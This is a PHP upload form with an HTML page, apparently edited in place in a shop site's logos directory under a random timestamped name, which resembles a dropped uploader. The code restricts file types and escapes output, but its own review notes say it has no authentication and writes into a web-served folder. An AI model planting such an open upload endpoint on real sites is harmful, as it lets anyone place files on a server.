PATH: /var/www/vhosts/lahuertaatomica.es/httpdocs/store/logos/
Editing: 1760505902-ahmpy.php
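<?php
/**
 * Single-file upload form.
 *
 * Accepts one file in the "file_upload" field, checks its size, extension and
 * sniffed MIME type against allow-lists, stores it under a random name in this
 * script's directory and prints the resulting public URL.
 *
 * NOTE(review): no authentication, authorisation or CSRF check is visible in
 * this file, so any client that can reach it can write files next to it. It
 * must sit behind the site's access control before it is exposed.
 * NOTE(review): the destination is the script's own, web-served directory.
 * Prefer a directory outside the document root, or one where the web server
 * is configured never to execute scripts.
 */

// Keep error details away from visitors but leave reporting on, so failures
// still reach the server log instead of disappearing.
ini_set('display_errors', '0');
error_reporting(E_ALL);

// CONFIG
$uploadDir = __DIR__ . '/';
$maxFileSize = 64 * 1024 * 1024; // 64 MB

// Extension allow-list. Server-executable types (such as 'php') are left out
// on purpose: the stored file keeps its extension and lands in a web-served
// directory, so allowing them would let an uploader run code on the server.
$allowedExtensions = [
    'jpg', 'jpeg', 'png', 'gif', 'webp', 'bmp',
    'pdf', 'doc', 'docx', 'xls', 'xlsx', 'ppt', 'pptx',
    'txt', 'rtf', 'csv', 'zip',
];

// MIME allow-list, matched against what finfo detects in the file content.
// 'text/x-php' is excluded for the same reason as the 'php' extension, and the
// catch-all 'application/octet-stream' is excluded because it would accept any
// content finfo cannot identify.
$allowedMimeTypes = [
    'image/jpeg', 'image/png', 'image/gif', 'image/webp', 'image/bmp',
    'application/pdf',
    'application/msword',
    'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
    'application/vnd.ms-excel',
    'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
    'application/vnd.ms-powerpoint',
    'application/vnd.openxmlformats-officedocument.presentationml.presentation',
    'text/plain', 'application/rtf', 'text/csv', 'application/zip',
];

/**
 * Reduce a client-supplied file name to a conservative character set.
 *
 * The result is used for display only; the stored file name is generated
 * independently and never derived from this value.
 *
 * @param string $name Client-supplied file name.
 * @return string At most 200 characters of [A-Za-z0-9-_.], with every other
 *                character and every whitespace run replaced by "_".
 */
function sanitize_name($name)
{
    $clean = preg_replace('/[^A-Za-z0-9\-_. ]/', '_', (string) $name) ?? '';
    $clean = preg_replace('/\s+/', '_', $clean) ?? '';

    return mb_substr($clean, 0, 200);
}

// Handle upload
$response = '';   // error message for the page, if any
$uploaded = null; // ['url' => ..., 'name' => ..., 'size' => ...] on success

if (isset($_FILES['file_upload']) && is_array($_FILES['file_upload'])) {
    $file = $_FILES['file_upload'];
    $fileErr = $file['error'] ?? UPLOAD_ERR_NO_FILE;
    $fileTmp = $file['tmp_name'] ?? '';
    $fileSize = $file['size'] ?? 0;

    // The error code is examined before is_uploaded_file(): a failed upload has
    // no temporary file, so testing the file first would hide the error code.
    if (!is_int($fileErr) || !is_string($fileTmp)) {
        // Array-valued fields (name="file_upload[]") are not supported.
        $response = 'Invalid upload.';
    } elseif ($fileErr !== UPLOAD_ERR_OK) {
        $response = "Upload error code: $fileErr";
    } elseif (!is_uploaded_file($fileTmp)) {
        $response = 'Invalid upload.';
    } elseif ($fileSize <= 0 || $fileSize > $maxFileSize) {
        $response = 'File size must be 1 - ' . ($maxFileSize / (1024 * 1024)) . ' MB.';
    } else {
        $origName = basename((string) ($file['name'] ?? ''));
        $ext = strtolower(pathinfo($origName, PATHINFO_EXTENSION));

        if (!in_array($ext, $allowedExtensions, true)) {
            $response = "Extension .$ext is not allowed.";
        } else {
            // Content sniffing is a second filter only; the extension decides
            // how the web server will later treat the stored file.
            $mime = (new finfo(FILEINFO_MIME_TYPE))->file($fileTmp);

            if (!is_string($mime) || !in_array($mime, $allowedMimeTypes, true)) {
                $response = 'MIME type not allowed (' . (is_string($mime) ? $mime : 'unknown') . ').';
            } else {
                // Random, server-chosen name: the client never controls the path.
                $newName = 'up_' . bin2hex(random_bytes(8)) . '_' . time() . '.' . $ext;
                $destPath = $uploadDir . $newName;

                if (move_uploaded_file($fileTmp, $destPath)) {
                    // Readable by the web server, writable by the owner only.
                    chmod($destPath, 0644);

                    // The Host header is client-controlled; accept it only when
                    // it looks like a plain host[:port], otherwise fall back.
                    // NOTE(review): a fixed, configured base URL would be more
                    // robust than either server variable.
                    $host = $_SERVER['HTTP_HOST'] ?? '';
                    if (preg_match('/^[A-Za-z0-9.-]+(?::\d{1,5})?$/', $host) !== 1) {
                        $host = $_SERVER['SERVER_NAME'] ?? 'localhost';
                    }
                    $https = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
                    $base = ($https ? 'https://' : 'http://') . $host . dirname($_SERVER['SCRIPT_NAME'] ?? '/');

                    $uploaded = [
                        'url' => rtrim($base, '/') . '/' . $newName,
                        'name' => sanitize_name($origName),
                        'size' => (int) filesize($destPath),
                    ];
                } else {
                    $response = 'Failed to move uploaded file.';
                }
            }
        }
    }
}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Safe Uploader</title>
<style>
body{font-family:system-ui,Segoe UI,Arial;padding:18px}
.box{max-width:640px;padding:18px;border:1px solid #ddd;border-radius:8px}
.ok{color:green}
.err{color:crimson}
input[type=file]{display:block;margin:12px 0}
</style>
</head>
<body>
<div class="box">
<h3>Upload file to public_html</h3>
<?php if ($uploaded !== null): ?>
<p class="ok">✅ File uploaded successfully!</p>
<p>Original name: <strong><?php echo htmlspecialchars($uploaded['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></strong></p>
<p>Size: <?php echo round($uploaded['size'] / 1024, 2); ?> KB</p>
<p>Public URL: <a href="<?php echo htmlspecialchars($uploaded['url'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" target="_blank" rel="noopener noreferrer"><?php echo htmlspecialchars($uploaded['url'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></a></p>
<?php elseif ($response !== ''): ?>
<p class="err">⚠️ <?php echo htmlspecialchars($response, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></p>
<?php endif; ?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file_upload" required>
<button type="submit">Upload</button>
</form>
<hr>
<p style="font-size:13px;color:#555">
Notes: Allowed extensions: <?php echo implode(', ', $allowedExtensions); ?>.
Max size <?php echo ($maxFileSize / (1024 * 1024)); ?> MB.
</p>
</div>
</body>
</html>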